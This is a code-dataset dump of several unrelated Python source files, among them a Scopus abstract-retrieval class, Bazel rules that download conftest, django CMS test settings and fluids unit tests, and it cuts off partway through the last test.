content
stringlengths
0
894k
type
stringclasses
2 values
from collections import namedtuple from pybliometrics.scopus.superclasses import Retrieval from pybliometrics.scopus.utils import chained_get, get_id, detect_id_type,\ get_link, listify class AbstractRetrieval(Retrieval): @property def abstract(self): """The abstract of a document. Note: If this is empty, try property description instead. """ return self._head.get('abstracts') @property def affiliation(self): """A list of namedtuples representing listed affiliations in the form (id, name, city, country). Note: Might be empty. """ out = [] aff = namedtuple('Affiliation', 'id name city country') affs = listify(self._json.get('affiliation', [])) for item in affs: new = aff(id=item.get('@id'), name=item.get('affilname'), city=item.get('affiliation-city'), country=item.get('affiliation-country')) out.append(new) return out or None @property def aggregationType(self): """Aggregation type of source the document is published in.""" return chained_get(self._json, ['coredata', 'prism:aggregationType']) @property def authkeywords(self): """List of author-provided keywords of the document.""" keywords = self._json.get('authkeywords') if not keywords: return None else: try: return [d['$'] for d in keywords['author-keyword']] except TypeError: # Singleton keyword return [keywords['author-keyword']['$']] @property def authorgroup(self): """A list of namedtuples representing the article's authors organized by affiliation, in the form (affiliation_id, dptid, organization, city, postalcode, addresspart, country, auid, indexed_name, surname, given_name). If "given_name" is not present, fall back to initials. Note: Affiliation information might be missing or mal-assigned even when it lookes correct in the web view. In this case please request a correction. """ out = [] fields = 'affiliation_id dptid organization city postalcode '\ 'addresspart country auid indexed_name surname given_name' auth = namedtuple('Author', fields) items = listify(self._head.get('author-group', [])) index_path = ['preferred-name', 'ce:indexed-name'] for item in items: if not item: continue # Affiliation information aff = item.get('affiliation', {}) try: aff_ids = listify(aff['affiliation-id']) aff_id = ", ".join([a["@afid"] for a in aff_ids]) except KeyError: aff_id = aff.get("@afid") org = _get_org(aff) # Author information (might relate to collaborations) authors = listify(item.get('author', item.get('collaboration', []))) for au in authors: try: given = au.get('ce:given-name', au['ce:initials']) except KeyError: # Collaboration given = au.get('ce:text') new = auth(affiliation_id=aff_id, organization=org, city=aff.get('city'), dptid=aff.get("@dptid"), postalcode=aff.get('postal-code'), addresspart=aff.get('address-part'), country=aff.get('country'), auid=au.get('@auid'), surname=au.get('ce:surname'), given_name=given, indexed_name=chained_get(au, index_path)) out.append(new) return out or None @property def authors(self): """A list of namedtuples representing the article's authors, in the form (auid, indexed_name, surname, given_name, affiliation_id, affiliation, city, country). Note: The affiliation referred to here is what Scopus' algorithm determined as the main affiliation. Property `authorgroup` provides all affiliations. """ out = [] fields = 'auid indexed_name surname given_name affiliation' auth = namedtuple('Author', fields) for item in chained_get(self._json, ['authors', 'author'], []): affs = [a for a in listify(item.get('affiliation')) if a] if affs: aff = [aff.get('@id') for aff in affs] else: aff = None new = auth(auid=item['@auid'], surname=item.get('ce:surname'), indexed_name=item.get('ce:indexed-name'), affiliation=aff, given_name=chained_get(item, ['preferred-name', 'ce:given-name'])) out.append(new) return out or None @property def citedby_count(self): """Number of articles citing the document.""" cites = chained_get(self._json, ['coredata', 'citedby-count']) if cites: cites = int(cites) return cites @property def citedby_link(self): """URL to Scopus page listing citing documents.""" return get_link(self._json, 2) @property def chemicals(self): """List of namedtuples representing chemical entities in the form (source, chemical_name, cas_registry_number). In case multiple numbers given, they are joined on ";". """ path = ['enhancement', 'chemicalgroup', 'chemicals'] items = listify(chained_get(self._head, path, [])) fields = 'source chemical_name cas_registry_number' chemical = namedtuple('Chemical', fields) out = [] for item in items: for chem in listify(item['chemical']): number = chem.get('cas-registry-number') try: # Multiple numbers given num = ";".join([n['$'] for n in number]) except TypeError: num = number new = chemical(source=item['@source'], cas_registry_number=num, chemical_name=chem['chemical-name']) out.append(new) return out or None @property def confcode(self): """Code of the conference the document belong to.""" return self._confevent.get('confcode') @property def confdate(self): """Date range of the conference the document belongs to represented by two tuples in the form (YYYY, MM, DD). """ dates = self._confevent.get('confdate', {}) try: keys = ("startdate", "enddate") date_order = ("@year", "@month", "@day") d = (tuple(int(dates[k1][k2]) for k2 in date_order) for k1 in keys) return tuple(d) except KeyError: return None @property def conflocation(self): """Location of the conference the document belongs to.""" return chained_get(self._confevent, ['conflocation', 'city-group']) @property def confname(self): """Name of the conference the document belongs to.""" return self._confevent.get('confname') @property def confsponsor(self): """Sponsor(s) of the conference the document belongs to.""" path = ['confsponsors', 'confsponsor'] sponsors = chained_get(self._confevent, path, []) if len(sponsors) == 0: return None if isinstance(sponsors, list): return [s['$'] for s in sponsors] return sponsors @property def contributor_group(self): """List of namedtuples representing contributors compiled by Scopus, in the form (given_name, initials, surname, indexed_name, role). """ path = ['source', 'contributor-group'] items = listify(chained_get(self._head, path, [])) out = [] fields = 'given_name initials surname indexed_name role' pers = namedtuple('Contributor', fields) for item in items: entry = item.get('contributor', {}) new = pers(indexed_name=entry.get('ce:indexed-name'), role=entry.get('@role'), surname=entry.get('ce:surname'), given_name=entry.get('ce:given-name'), initials=entry.get('ce:initials')) out.append(new) return out or None @property def correspondence(self): """namedtuple representing the author to whom correspondence should be addressed, in the form (surname, initials, organization, country, city_group). Multiple organziations are joined on semicolon. """ fields = 'surname initials organization country city_group' auth = namedtuple('Correspondence', fields) corr = self._head.get('correspondence') if corr is None: return None aff = corr.get('affiliation', {}) try: org = aff['organization'] try: org = org['$'] except TypeError: # Multiple names given org = "; ".join([d['$'] for d in org]) except KeyError: org = None return auth(surname=corr.get('person', {}).get('ce:surname'), initials=corr.get('person', {}).get('ce:initials'), organization=org, country=aff.get('country'), city_group=aff.get('city-group')) @property def coverDate(self): """The date of the cover the document is in.""" return chained_get(self._json, ['coredata', 'prism:coverDate']) @property def description(self): """Return the description of a record. Note: If this is empty, try property abstract instead. """ return chained_get(self._json, ['coredata', 'dc:description']) @property def doi(self): """DOI of the document.""" return chained_get(self._json, ['coredata', 'prism:doi']) @property def eid(self): """EID of the document.""" return chained_get(self._json, ['coredata', 'eid']) @property def endingPage(self): """Ending page. If this is empty, try .pageRange instead.""" # Try coredata first, fall back to head afterwards ending = chained_get(self._json, ['coredata', 'prism:endingPage']) if not ending: path = ['source', 'volisspag', 'pagerange', '@last'] ending = chained_get(self._head, path) return ending @property def funding(self): """List of namedtuples parsed funding information in the form (agency string id acronym country). """ path = ['item', 'xocs:meta', 'xocs:funding-list', 'xocs:funding'] funds = listify(chained_get(self._json, path, [])) out = [] fund = namedtuple('Funding', 'agency string id acronym country') for item in funds: new = fund(agency=item.get('xocs:funding-agency'), string=item.get('xocs:funding-agency-matched-string'), id=item.get('xocs:funding-agency-id'), acronym=item.get('xocs:funding-agency-acronym'), country=item.get('xocs:funding-agency-country')) out.append(new) return out or None @property def funding_text(self): """The raw text from which Scopus derives funding information.""" path = ['item', 'xocs:meta', 'xocs:funding-list', 'xocs:funding-text'] return chained_get(self._json, path) @property def isbn(self): """ISBNs belonging to publicationName as tuple of variying length, (e.g. ISBN-10 or ISBN-13).""" isbns = listify(chained_get(self._head, ['source', 'isbn'], [])) if len(isbns) == 0: return None else: return tuple((i['$'] for i in isbns)) @property def issn(self): """ISSN belonging to the publicationName. Note: If E-ISSN is known to Scopus, this returns both ISSN and E-ISSN in random order separated by blank space. """ return chained_get(self._json, ['coredata', 'prism:issn']) @property def identifier(self): """ID of the document (same as EID without "2-s2.0-").""" return get_id(self._json) @property def idxterms(self): """List of index terms (these are just one category of those Scopus provides in the web version) .""" try: terms = listify(self._json.get("idxterms", {}).get('mainterm', [])) except AttributeError: # idxterms is empty return None try: return [d['$'] for d in terms] or None except AttributeError: return None @property def issueIdentifier(self): """Number of the issue the document was published in.""" return chained_get(self._json, ['coredata', 'prism:issueIdentifier']) @property def issuetitle(self): """Title of the issue the document was published in.""" return chained_get(self._head, ['source', 'issuetitle']) @property def language(self): """Language of the article.""" return chained_get(self._json, ['language', '@xml:lang']) @property def openaccess(self): """The openaccess status encoded in single digits.""" return chained_get(self._json, ['coredata', 'openaccess']) @property def openaccessFlag(self): """Whether the document is available via open access or not.""" flag = chained_get(self._json, ['coredata', 'openaccessFlag']) if flag: flag = flag == "true" return flag @property def pageRange(self): """Page range. If this is empty, try .startingPage and .endingPage instead. """ # Try data from coredata first, fall back to head afterwards pages = chained_get(self._json, ['coredata', 'prism:pageRange']) if not pages: return chained_get(self._head, ['source', 'volisspag', 'pages']) return pages @property def pii(self): """The PII (Publisher Item Identifier) of the document.""" return chained_get(self._json, ['coredata', 'pii']) @property def publicationName(self): """Name of source the document is published in.""" return chained_get(self._json, ['coredata', 'prism:publicationName']) @property def publisher(self): """Name of the publisher of the document. Note: Information provided in the FULL view of the article might be more complete. """ # Return information from FULL view, fall back to other views full = chained_get(self._head, ['source', 'publisher', 'publishername']) if full is None: return chained_get(self._json, ['coredata', 'dc:publisher']) else: return full @property def publisheraddress(self): """Name of the publisher of the document.""" return chained_get(self._head, ['source', 'publisher', 'publisheraddress']) @property def pubmed_id(self): """The PubMed ID of the document.""" return chained_get(self._json, ['coredata', 'pubmed-id']) @property def refcount(self): """Number of references of an article. Note: Requires either the FULL view or REF view. """ try: # REF view return self._ref['@total-references'] except KeyError: # FULL view return self._ref.get('@refcount') @property def references(self): """List of namedtuples representing references listed in the document, in the form (position, id, doi, title, authors, authors_auid, authors_affiliationid, sourcetitle, publicationyear, volume, issue, first, last, citedbycount, type, text, fulltext). `position` is the number at which the reference appears in the document, `id` is the Scopus ID of the referenced document (EID without the "2-s2.0-"), `authors` is a string of the names of the authors in the format "Surname1, Initials1; Surname2, Initials2", `authors_auid` is a string of the author IDs joined on "; ", `authors_affiliationid` is a string of the authors' affiliation IDs joined on "; ", `sourcetitle` is the name of the source (e.g. the journal), `publicationyear` is the year of the publication as a string, `volume` and `issue`, are strings referring to the volume and issue, `first` and `last` refer to the page range, `citedbycount` is a string for the total number of citations of the cited item, `type` describes the parsing status of the reference (resolved or not), `text` is Scopus-provided information on the publication, `fulltext` is the text the authors used for the reference. Note: Requires either the FULL view or REF view. Might be empty even if refcount is positive. Specific fields can be empty. Author lists (authors, authors_auid, authors_affiliationid) may contain duplicates but None's have been filtered out. """ out = [] fields = 'position id doi title authors authors_auid '\ 'authors_affiliationid sourcetitle publicationyear volume '\ 'issue first last citedbycount type text fulltext' ref = namedtuple('Reference', fields) items = listify(self._ref.get("reference", [])) for item in items: info = item.get('ref-info', item) volisspag = info.get('volisspag', {}) or {} if isinstance(volisspag, list): volisspag = volisspag[0] volis = volisspag.get("voliss", {}) if isinstance(volis, list): volis = volis[0] # Parse author information try: # FULL view parsing auth = listify(item['ref-info']['ref-authors']['author']) authors = [', '.join([d['ce:surname'], d['ce:initials']]) for d in auth] auids = None affids = None ids = listify(info['refd-itemidlist']['itemid']) doi = _select_by_idtype(ids, id_type='DOI') scopus_id = _select_by_idtype(ids, id_type='SGR') except KeyError: # REF view parsing auth = (info.get('author-list') or {}).get('author', []) authors = [', '.join(filter(None, [d.get('ce:surname'), d.get('ce:given-name')])) for d in auth] auids = "; ".join(filter(None, [d.get('@auid') for d in auth])) affs = filter(None, [d.get('affiliation') for d in auth]) affids = "; ".join([aff.get('@id') for aff in affs]) doi = info.get('ce:doi') scopus_id = info.get('scopus-id') # Combine information new = ref(position=item.get('@id'), id=scopus_id, doi=doi, authors="; ".join(authors), authors_auid=auids or None, authors_affiliationid=affids or None, title=info.get('ref-title', {}).get('ref-titletext', info.get('title')), sourcetitle=info.get('ref-sourcetitle', info.get('sourcetitle')), publicationyear=info.get('ref-publicationyear', {}).get('@first'), volume=volis.get('@volume'), issue=volis.get('@issue'), first=volisspag.get('pagerange', {}).get('@first'), last=volisspag.get('pagerange', {}).get('@last'), citedbycount=info.get('citedby-count'), type=info.get('type'), text=info.get('ref-text'), fulltext=item.get('ref-fulltext')) out.append(new) return out or None @property def scopus_link(self): """URL to the document page on Scopus.""" return get_link(self._json, 1) @property def self_link(self): """URL to Scopus API page of this document.""" return get_link(self._json, 0) @property def sequencebank(self): """List of namedtuples representing biological entities defined or mentioned in the text, in the form (name, sequence_number, type). """ path = ['enhancement', 'sequencebanks', 'sequencebank'] items = listify(chained_get(self._head, path, [])) bank = namedtuple('Sequencebank', 'name sequence_number type') out = [] for item in items: numbers = listify(item['sequence-number']) for number in numbers: new = bank(name=item['@name'], sequence_number=number['$'], type=number['@type']) out.append(new) return out or None @property def source_id(self): """Scopus source ID of the document.""" return chained_get(self._json, ['coredata', 'source-id']) @property def sourcetitle_abbreviation(self): """Abbreviation of the source the document is published in. Note: Requires the FULL view of the article. """ return self._head.get('source', {}).get('sourcetitle-abbrev') @property def srctype(self): """Aggregation type of source the document is published in (short version of aggregationType). """ return chained_get(self._json, ['coredata', 'srctype']) @property def startingPage(self): """Starting page. If this is empty, try .pageRange instead.""" # Try coredata first, fall back to bibrecord afterwards starting = chained_get(self._json, ['coredata', 'prism:startingPage']) if not starting: path = ['source', 'volisspag', 'pagerange', '@first'] starting = chained_get(self._head, path) return starting @property def subject_areas(self): """List of namedtuples containing subject areas of the article in the form (area abbreviation code). Note: Requires the FULL view of the article. """ area = namedtuple('Area', 'area abbreviation code') path = ['subject-areas', 'subject-area'] out = [area(area=item['$'], abbreviation=item['@abbrev'], code=item['@code']) for item in listify(chained_get(self._json, path, []))] return out or None @property def subtype(self): """Type of the document. Refer to the Scopus Content Coverage Guide for a list of possible values. Short version of subtypedescription. """ return chained_get(self._json, ['coredata', 'subtype']) or None @property def subtypedescription(self): """Type of the document. Refer to the Scopus Content Coverage Guide for a list of possible values. Long version of subtype. """ return chained_get(self._json, ['coredata', 'subtypeDescription']) or None @property def title(self): """Title of the document.""" return chained_get(self._json, ['coredata', 'dc:title']) @property def url(self): """URL to the API view of the document.""" return chained_get(self._json, ['coredata', 'prism:url']) @property def volume(self): """Volume for the document.""" return chained_get(self._json, ['coredata', 'prism:volume']) @property def website(self): """Website of publisher.""" path = ['source', 'website', 'ce:e-address', '$'] return chained_get(self._head, path) def __init__(self, identifier=None, refresh=False, view='META_ABS', id_type=None): """Interaction with the Abstract Retrieval API. Parameters ---------- identifier : str or int The identifier of a document. Can be the Scopus EID, the Scopus ID, the PII, the Pubmed-ID or the DOI. refresh : bool or int (optional, default=False) Whether to refresh the cached file if it exists or not. If int is passed, cached file will be refreshed if the number of days since last modification exceeds that value. id_type: str (optional, default=None) The type of used ID. Allowed values: None, 'eid', 'pii', 'scopus_id', 'pubmed_id', 'doi'. If the value is None, the function tries to infer the ID type itself. view : str (optional, default=META_ABS) The view of the file that should be downloaded. Allowed values: META, META_ABS, REF, FULL, where FULL includes all information of META_ABS view and META_ABS includes all information of the META view. For details see https://dev.elsevier.com/guides/AbstractRetrievalViews.htm. Raises ------ ValueError If the id_type parameter or the view parameter contains invalid entries. Examples -------- See https://pybliometrics.readthedocs.io/en/stable/examples/AbstractRetrieval.html. Notes ----- The directory for cached results is `{path}/{view}/{identifier}`, where `path` is specified in `~/.scopus/config.ini`. In case `identifier` is a DOI,, an underscore replaces the forward slash. """ # Checks identifier = str(identifier) allowed_views = ('META', 'META_ABS', 'REF', 'FULL') if view not in allowed_views: raise ValueError('view parameter must be one of ' + ', '.join(allowed_views)) if id_type is None: id_type = detect_id_type(identifier) else: allowed_id_types = ('eid', 'pii', 'scopus_id', 'pubmed_id', 'doi') if id_type not in allowed_id_types: raise ValueError('id_type parameter must be one of ' + ', '.join(allowed_id_types)) # Load json Retrieval.__init__(self, identifier=identifier, id_type=id_type, api='AbstractRetrieval', refresh=refresh, view=view) self._json = self._json['abstracts-retrieval-response'] self._head = chained_get(self._json, ["item", "bibrecord", "head"], {}) conf_path = ['source', 'additional-srcinfo', 'conferenceinfo', 'confevent'] self._confevent = chained_get(self._head, conf_path, {}) if self._view == "REF": ref_path = ["references"] else: ref_path = ['item', 'bibrecord', 'tail', 'bibliography'] self._ref = chained_get(self._json, ref_path, {}) def __str__(self): """Return pretty text version of the document. Assumes the document is a journal article and was loaded with view="META_ABS" or view="FULL". """ date = self.get_cache_file_mdate().split()[0] # Authors if self.authors: if len(self.authors) > 1: authors = _list_authors(self.authors) else: a = self.authors[0] authors = str(a.given_name) + ' ' + str(a.surname) else: authors = "(No author found)" # All other information s = f'{authors}: "{self.title}", {self.publicationName}, {self.volume}' if self.issueIdentifier: s += f'({self.issueIdentifier})' s += ', ' s += _parse_pages(self) s += f'({self.coverDate[:4]}).' if self.doi: s += f' https://doi.org/{self.doi}.\n' s += f'{self.citedby_count} citation(s) as of {date}' if self.affiliation: s += "\n Affiliation(s):\n " s += '\n '.join([aff.name for aff in self.affiliation]) return s def get_bibtex(self): """Bibliographic entry in BibTeX format. Raises ------ ValueError If the item's aggregationType is not Journal. """ if self.aggregationType != 'Journal': raise ValueError('Only Journal articles supported.') # Item key year = self.coverDate[0:4] first = self.title.split()[0].title() last = self.title.split()[-1].title() key = ''.join([self.authors[0].surname, year, first, last]) # Authors authors = ' and '.join([f"{a.given_name} {a.surname}" for a in self.authors]) # Pages if self.pageRange: pages = self.pageRange elif self.startingPage: pages = f'{self.startingPage}-{self.endingPage}' else: pages = '-' # All information bib = "@article{{{key},\n author = {{{auth}}},\n title = "\ "{{{{{title}}}}},\n journal = {{{jour}}},\n year = "\ "{{{year}}},\n volume = {{{vol}}},\n number = {{{number}}},"\ "\n pages = {{{pages}}}".format( key=key, auth=authors, title=self.title, year=year, jour=self.publicationName, vol=self.volume, number=self.issueIdentifier, pages=pages) # DOI if self.doi: bib += ",\n doi = {{{}}}".format(self.doi) bib += "}" return bib def get_html(self): """Bibliographic entry in html format.""" # Author links au_link = ('<a href="https://www.scopus.com/authid/detail.url' '?origin=AuthorProfile&authorId={0}">{1}</a>') if len(self.authors) > 1: authors = u', '.join([au_link.format(a.auid, a.given_name + ' ' + a.surname) for a in self.authors[0:-1]]) authors += (u' and ' + au_link.format(self.authors[-1].auid, (str(self.authors[-1].given_name) + ' ' + str(self.authors[-1].surname)))) else: a = self.authors[0] authors = au_link.format(a.auid, a.given_name + ' ' + a.surname) title = u'<a href="{}">{}</a>'.format(self.scopus_link, self.title) if self.volume and self.issueIdentifier: volissue = u'<b>{}({})</b>'.format(self.volume, self.issueIdentifier) elif self.volume: volissue = u'<b>{}</b>'.format(self.volume) else: volissue = 'no volume' jlink = '<a href="https://www.scopus.com/source/sourceInfo.url'\ f'?sourceId={self.source_id}">{self.publicationName}</a>' s = f"{authors}, {title}, {jlink}, {volissue}, " +\ f"{_parse_pages(self, unicode=True)}, ({self.coverDate[:4]})." if self.doi: s += f' <a href="https://doi.org/{self.doi}">doi:{self.doi}</a>.' return s def get_latex(self): """Bibliographic entry in LaTeX format.""" if len(self.authors) > 1: authors = _list_authors(self.authors) else: a = self.authors authors = ' '.join([a.given_name, a.surname]) if self.volume and self.issueIdentifier: volissue = f'\\textbf{{{self.volume}({self.issueIdentifier})}}' elif self.volume: volissue = f'\\textbf{{{self.volume}}}' else: volissue = 'no volume' s = f'{authors}, \\textit{{{self.title}}}, {self.publicationName}, ' +\ f'{volissue}, {_parse_pages(self)} ({self.coverDate[:4]}).' if self.doi: s += f' \\href{{https://doi.org/{self.doi}}}{{doi:{self.doi}}}, ' s += f'\\href{{{self.scopus_link}}}{{scopus:{self.eid}}}.' return s def get_ris(self): """Bibliographic entry in RIS (Research Information System Format) format for journal articles. Raises ------ ValueError If the item's aggregationType is not Journal. """ if self.aggregationType != 'Journal': raise ValueError('Only Journal articles supported.') # Basic information ris = f"TY - JOUR\nTI - {self.title}\nJO - {self.publicationName}"\ f"\nVL - {self.volume}\nDA - {self.coverDate}\n"\ f"PY - {self.coverDate[0:4]}\nSP - {self.pageRange}\n" # Authors for au in self.authors: ris += f'AU - {au.indexed_name}\n' # DOI if self.doi: ris += f'DO - {self.doi}\nUR - https://doi.org/{self.doi}\n' # Issue if self.issueIdentifier: ris += f'IS - {self.issueIdentifier}\n' ris += 'ER - \n\n' return ris def _get_org(aff): """Auxiliary function to extract org information from affiliation for authorgroup. """ try: org = aff['organization'] if not isinstance(org, str): try: org = org['$'] except TypeError: # Multiple names given org = ', '.join([d['$'] for d in org if d]) except KeyError: # Author group w/o affiliation org = None return org def _list_authors(lst): """Format a list of authors (Surname, Firstname and Firstname Surname).""" authors = ', '.join([' '.join([a.given_name, a.surname]) for a in lst[0:-1]]) authors += ' and ' + ' '.join([lst[-1].given_name, lst[-1].surname]) return authors def _parse_pages(self, unicode=False): """Auxiliary function to parse and format page range of a document.""" if self.pageRange: pages = f'pp. {self.pageRange}' elif self.startingPage: pages = f'pp. {self.startingPage}-{self.endingPage}' else: pages = '(no pages found)' if unicode: pages = u'{}'.format(pages) return pages def _select_by_idtype(lst, id_type): """Auxiliary function to return items matching a special idtype.""" try: return [d['$'] for d in lst if d['@idtype'] == id_type][0] except IndexError: return None
python
"""Repository macros for conftest""" load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") load(":platforms.bzl", "OS_ARCH") CONFTEST_VERSION = "0.23.0" _BUILD_FILE_CONTENT = """ exports_files(["conftest"]) """ SHA256S = { "conftest_0.23.0_Darwin_x86_64.tar.gz": "863d2eb3f9074c064e5fc0f81946fb7a04325dd72168468c83a99d139337bafc", "conftest_0.23.0_Linux_x86_64.tar.gz": "60b9c2f2338514b9ec3185051ff29b3aa83c753901810b3a396789c33fd520de", "conftest_0.23.0_Linux_arm64.tar.gz": "852668ffc20bcecbb7ab4862e911b4f35e37d6df1ead89ee1d35901ce03c9e08", "conftest_0.23.0_Windows_x86_64.zip": "d7aef1c7a91800a7212eb87d6d3b83a0b931a7b1dc03a346f220a1fd04f4056d", } def conftest_rules_dependencies(): for os, arch in OS_ARCH: archive_format = "zip" if os == "windows" else "tar.gz" archive_name = "conftest_{v}_{os}_{arch}.{format}".format( v = CONFTEST_VERSION, os = os.capitalize(), arch = arch, format = archive_format, ) http_archive( name = "conftest_{os}_{arch}".format(os = os, arch = arch), sha256 = SHA256S[archive_name], urls = [ "https://github.com/open-policy-agent/conftest/releases/download/v{}/{}".format(CONFTEST_VERSION, archive_name), ], build_file_content = _BUILD_FILE_CONTENT, )
python
from skipper_lib.events.event_receiver import EventReceiver from app.data_service import DataService import os def main(): event_receiver = EventReceiver(username=os.getenv('RABBITMQ_USER', 'skipper'), password=os.getenv('RABBITMQ_PASSWORD', 'welcome1'), host=os.getenv('RABBITMQ_HOST', '127.0.0.1'), port=os.getenv('RABBITMQ_PORT', 5672), queue_name=os.getenv('QUEUE_NAME', 'skipper_data'), service=DataService, service_name=os.getenv('SERVICE_NAME', 'data'), logger=os.getenv('LOGGER_RECEIVER_URL', 'http://127.0.0.1:5001/api/v1/skipper/logger/log_receiver')) if __name__ == "__main__": main()
python
# helpers.py import datetime # import whois import json import socket import time import traceback from random import choice from threading import Thread from urllib.parse import quote as urlencode from urllib.parse import unquote import pytz import requests import socks import subprocess from urllib.error import URLError from pytrends.request import TrendReq LOG_TRACE = True TOTAL_WORLD_CAP_TRILLIONS_USD = 116.78 # Source: https://www.statista.com/statistics/274490/global-value-of-share-holdings-since-2000/ def get_pretty_json_string(value): return json.dumps(value, indent=4, sort_keys=True, ensure_ascii=False) def shell( shell_command_line: str, print_stdout_stderr_bool: bool = True, capture_streams_bool: bool = True, as_text: bool = True, shell_executable_str: str = "bash", command_line_flag_str: str = "-c" ): result = subprocess.run( [shell_executable_str, command_line_flag_str, shell_command_line], stdout = subprocess.PIPE, stderr = subprocess.PIPE #capture_output=capture_streams_bool, text=as_text # py3.7+ ) if print_stdout_stderr_bool: try: print(result.stdout.decode('utf-8')) except KeyboardInterrupt: raise except: traceback.print_exc() try: print(result.stderr.decode('utf-8')) except KeyboardInterrupt: raise except: traceback.print_exc() return result
python
HELPER_SETTINGS = { "TIME_ZONE": "America/Chicago", "INSTALLED_APPS": [ "djangocms_text_ckeditor", "djangocms_versioning", "djangocms_versioning.test_utils.extensions", "djangocms_versioning.test_utils.polls", "djangocms_versioning.test_utils.blogpost", "djangocms_versioning.test_utils.text", "djangocms_versioning.test_utils.people", "djangocms_versioning.test_utils.unversioned_editable_app", ], "MIGRATION_MODULES": { "auth": None, "cms": None, "menus": None, "djangocms_versioning": None, }, "CMS_PERMISSION": True, "LANGUAGES": ( ("en", "English"), ("de", "German"), ("fr", "French"), ("it", "Italiano"), ), "CMS_LANGUAGES": { 1: [ {"code": "en", "name": "English", "fallbacks": ["de", "fr"]}, { "code": "de", "name": "Deutsche", "fallbacks": ["en"], # FOR TESTING DO NOT ADD 'fr' HERE }, { "code": "fr", "name": "Française", "fallbacks": ["en"], # FOR TESTING DO NOT ADD 'de' HERE }, { "code": "it", "name": "Italiano", "fallbacks": ["fr"], # FOR TESTING, LEAVE AS ONLY 'fr' }, ] }, "PARLER_ENABLE_CACHING": False, "LANGUAGE_CODE": "en", } def run(): from djangocms_helper import runner runner.cms("djangocms_versioning", extra_args=[]) if __name__ == "__main__": run()
python
#!/usr/bin/env python # -*- coding: utf-8 -*- """ script to open directory in current window manager """ import utool as ut if __name__ == '__main__': import sys if len(sys.argv) == 2: path = sys.argv[1] else: path = None ut.assertpath(path) if ut.checkpath(path, verbose=True): ut.view_directory(path) # F:\\data\\work\\PZ_MTEST\\_ibsdb\\
python
# -*- coding: utf-8 -*- '''Chemical Engineering Design Library (ChEDL). Utilities for process modeling. Copyright (C) 2017 Caleb Bell <[email protected]> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' from __future__ import division import types from fluids.numerics import assert_close, assert_close1d, assert_close2d import pytest import fluids from fluids.units import * from fluids.units import kwargs_to_args def test_kwargs_to_args(): sig = ['rho', 'mu', 'nu'] args = (1,) kwargs = {'mu': 2.2} assert [1, 2.2, None] == kwargs_to_args(args, kwargs, sig) kwargs = {'nu': 2.2} assert [1, None, 2.2] == kwargs_to_args(args, kwargs, sig) assert [12.2, 2.2, 5.5] == kwargs_to_args(tuple(), {'mu': 2.2, 'nu': 5.5, 'rho': 12.2}, sig) assert [None, None, None] == kwargs_to_args(tuple(), {}, sig) assert [12.2, 2.2, 5.5] == kwargs_to_args((12.2, 2.2, 5.5), {}, sig) def assert_pint_allclose(value, magnitude, units, rtol=1e-7, atol=0): assert_close(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def assert_pint_allclose1d(value, magnitude, units, rtol=1e-7, atol=0): assert_close1d(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def assert_pint_allclose2d(value, magnitude, units, rtol=1e-7, atol=0): assert_close2d(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def test_in_right_units(): assert u.default_system == 'mks' def test_nondimensional_reduction(): Re = 171.8865229090909 *u.meter * u.pound / u.centipoise / u.foot ** 2 / u.second eD = 0.0005937067088858105*u.inch/u.meter assert_close(friction_factor(Re, eD).magnitude, 0.012301598061848239) def test_convert_input(): from fluids.units import convert_input ans = convert_input(5, 'm', u, False) assert ans == 5 with pytest.raises(Exception): convert_input(5, 'm', u, True) def test_sample_cases(): Re = Reynolds(V=3.5*u.m/u.s, D=2*u.m, rho=997.1*u.kg/u.m**3, mu=1E-3*u.Pa*u.s) assert_close(Re.to_base_units().magnitude, 6979700.0) assert dict(Re.dimensionality) == {} # vs = hwm93(5E5*u.m, 45*u.degrees, 50*u.degrees, 365*u.day) # vs_known = [-73.00312042236328, 0.1485661268234253] # for v_known, v_calc in zip(vs_known, vs): # assert_close(v_known, v_calc.to_base_units().magnitude) # assert dict(v_calc.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} A = API520_A_g(m=24270*u.kg/u.hour, T=348.*u.K, Z=0.90, MW=51.*u.g/u.mol, k=1.11, P1=670*u.kPa, Kb=1, Kc=1) assert_close(A.to_base_units().magnitude, 0.00369904606468) assert dict(A.dimensionality) == {u'[length]': 2.0} T = T_critical_flow(473*u.K, 1.289) assert_close(T.to_base_units().magnitude, 413.280908694) assert dict(T.dimensionality) == {u'[temperature]': 1.0} T2 = T_critical_flow(473*u.K, 1.289*u.dimensionless) assert T == T2 with pytest.raises(Exception): T_critical_flow(473, 1.289) with pytest.raises(Exception): T_critical_flow(473*u.m, 1.289) # boolean P1 = 8*u.bar + 1*u.atm P2 = 1*u.atm assert True == is_critical_flow(P1, P2, k=1.4*u.dimensionless) A = size_control_valve_g(T=433.*u.K, MW=44.01*u.g/u.mol, mu=1.4665E-4*u.Pa*u.s, gamma=1.30, Z=0.988, P1=680*u.kPa, P2=310*u.kPa, Q=38/36.*u.m**3/u.s, D1=0.08*u.m, D2=0.1*u.m, d=0.05*u.m, FL=0.85, Fd=0.42, xT=0.60) assert_close(A.to_base_units().magnitude, 0.0201629570705307) assert dict(A.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} A = API520_round_size(A=1E-4*u.m**2) assert_close(A.to_base_units().magnitude, 0.00012645136) assert dict(A.dimensionality) == {u'[length]': 2.0} SS = specific_speed(0.0402*u.m**3/u.s, 100*u.m, 